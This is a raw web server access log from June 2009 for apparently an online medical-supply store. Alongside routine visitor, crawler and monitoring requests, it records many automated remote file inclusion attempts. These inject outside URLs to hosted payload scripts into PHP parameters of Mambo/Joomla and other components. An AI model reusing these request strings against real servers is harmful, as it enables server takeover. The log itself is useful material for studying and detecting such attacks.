85.17.162.28 - - [04/Jun/2009:03:30:10 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
67.15.14.89 - - [04/Jun/2009:03:31:35 -0400] "GET /logs/access_log.Q109052100%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://prideofderby.co.uk/language/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
67.15.14.89 - - [04/Jun/2009:03:31:35 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://prideofderby.co.uk/language/fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
67.15.14.89 - - [04/Jun/2009:03:31:35 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://prideofderby.co.uk/language/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
77.166.79.119 - - [04/Jun/2009:03:31:52 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Avant Browser)"
67.15.14.89 - - [04/Jun/2009:03:32:28 -0400] "GET /logs/access_log.Q109052600%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://prideofderby.co.uk/language/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:03:32:49 -0400] "GET /solpot.html?body=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:03:32:49 -0400] "GET /logs/solpot.html?body=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:03:32:50 -0400] "GET /solpot.html?body=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:03:32:50 -0400] "GET /logs/solpot.html?body=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:03:32:55 -0400] "GET /solpot.html?body=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:03:32:55 -0400] "GET /logs/solpot.html?body=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:03:33:11 -0400] "GET /solpot.html?body=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:03:33:11 -0400] "GET /logs/solpot.html?body=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:03:33:13 -0400] "GET /solpot.html?body=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:03:33:13 -0400] "GET /logs/solpot.html?body=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:03:33:14 -0400] "GET /solpot.html?body=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:03:33:14 -0400] "GET /logs/solpot.html?body=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:33:32 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:33:32 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:33:34 -0400] "GET /logs/access_log.Q109050900%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:35:13 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:35:13 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:35:44 -0400] "GET /logs/access_log.Q109050900%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:35:46 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:35:46 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:03:37:02 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:03:37:10 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:03:37:12 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
91.121.137.51 - - [04/Jun/2009:03:37:35 -0400] "GET /logs/error_log.Q109013100//index3.php?page=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.121.137.51 - - [04/Jun/2009:03:37:35 -0400] "GET /logs//index3.php?page=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
91.121.137.51 - - [04/Jun/2009:03:37:35 -0400] "GET //index3.php?page=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
199.120.90.222 - - [04/Jun/2009:03:37:44 -0400] "GET /logs/access_log.Q109050900//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:03:37:59 -0400] "GET /logs/errors.php?error=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:03:37:59 -0400] "GET /logs/access_log.Q108052700/errors.php?error=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:03:37:59 -0400] "GET /errors.php?error=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:03:38:01 -0400] "GET /errors.php?error=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:03:38:02 -0400] "GET /logs/access_log.Q108052700/errors.php?error=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:03:38:02 -0400] "GET /logs/errors.php?error=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.6.8.112 - - [04/Jun/2009:03:38:05 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.112 - - [04/Jun/2009:03:38:05 -0400] "GET /scripts/browser_ns6.js HTTP/1.0" 200 8373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.223.87.173 - - [04/Jun/2009:03:38:10 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:38:10 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:38:11 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:38:11 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
65.23.158.226 - - [04/Jun/2009:03:38:12 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:03:38:15 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
118.223.87.173 - - [04/Jun/2009:03:38:25 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:38:25 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:38:26 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:38:26 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
209.59.12.99 - - [04/Jun/2009:03:39:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.223.87.173 - - [04/Jun/2009:03:39:25 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:39:25 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
199.120.90.222 - - [04/Jun/2009:03:39:25 -0400] "GET /logs/access_log.Q109050900//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
118.223.87.173 - - [04/Jun/2009:03:39:26 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:39:26 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
65.23.158.226 - - [04/Jun/2009:03:39:47 -0400] "GET /logs/access_log.Q108052700%20%20/errors.php?error=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:03:39:47 -0400] "GET /logs/access_log.Q108052700%20%20/errors.php?error=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:03:39:57 -0400] "GET /logs/access_log.Q109052100%20%20/errors.php?error=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:03:39:57 -0400] "GET /logs/access_log.Q109052100%20%20/errors.php?error=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.223.87.173 - - [04/Jun/2009:03:40:01 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:01 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:01 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:09 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:09 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:09 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:09 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:11 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:11 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:11 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:11 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:13 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:13 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:14 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:14 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:16 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:16 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:16 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
118.223.87.173 - - [04/Jun/2009:03:40:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
199.120.90.222 - - [04/Jun/2009:03:40:27 -0400] "GET /logs/access_log.Q109050900//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:42:46 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:42:51 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:42:51 -0400] "GET /logs/access_log.Q108121900%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:44:02 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:03:44:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.15.14.89 - - [04/Jun/2009:03:44:50 -0400] "GET /logs/access_log.Q109052100//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://prideofderby.co.uk/language/fx29id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.15.14.89 - - [04/Jun/2009:03:45:02 -0400] "GET /logs/access_log.Q109052600//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://prideofderby.co.uk/language/fx29id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:45:51 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:45:51 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:45:52 -0400] "GET /logs/access_log.Q108121900%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:46:59 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:03:47:46 -0400] "GET /show.php?path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:03:47:46 -0400] "GET /logs/show.php?path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:03:47:46 -0400] "GET /logs/access_log.Q109052100%20%20/show.php?path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:03:47:48 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:03:47:52 -0400] "GET /show.php?path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:03:47:52 -0400] "GET /logs/show.php?path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:03:47:52 -0400] "GET /logs/access_log.Q109052100/show.php?path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
213.171.225.234 - - [04/Jun/2009:03:49:17 -0400] "GET /errors.php?error=http://www.graal-plus.zp.ua//images/r.jpg?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
209.59.12.99 - - [04/Jun/2009:03:49:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.54 - - [04/Jun/2009:03:50:10 -0400] "GET /images/items/45418015_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
209.51.133.202 - - [04/Jun/2009:03:53:25 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:03:53:25 -0400] "GET /?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:03:53:25 -0400] "GET /logs/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 4098 "-" "Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:03:53:25 -0400] "GET /logs/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 4098 "-" "Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:03:53:25 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:03:53:25 -0400] "GET /?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:03:53:33 -0400] "GET /logs/access_log.Q109052100%20%20/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:03:54:07 -0400] "GET /logs/access_log.Q109052100%20%20/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:03:54:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [04/Jun/2009:03:56:42 -0400] "GET ///?_zb_path=http://emak.3dn.ru/id1.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:03:56:42 -0400] "GET /logs///?_zb_path=http://emak.3dn.ru/id1.txt???? HTTP/1.1" 200 4104 "-" "Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:03:56:42 -0400] "GET /logs/access_log.Q109051800///?_zb_path=http://emak.3dn.ru/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:03:57:37 -0400] "GET /logs/access_log.Q109052200///?_zb_path=http://emak.3dn.ru/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:03:57:39 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:03:57:39 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:03:57:46 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:03:57:57 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
81.137.226.190 - - [04/Jun/2009:03:58:25 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
81.137.226.190 - - [04/Jun/2009:03:58:25 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
81.137.226.190 - - [04/Jun/2009:03:58:26 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
81.137.226.190 - - [04/Jun/2009:03:58:26 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
209.59.12.99 - - [04/Jun/2009:03:59:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
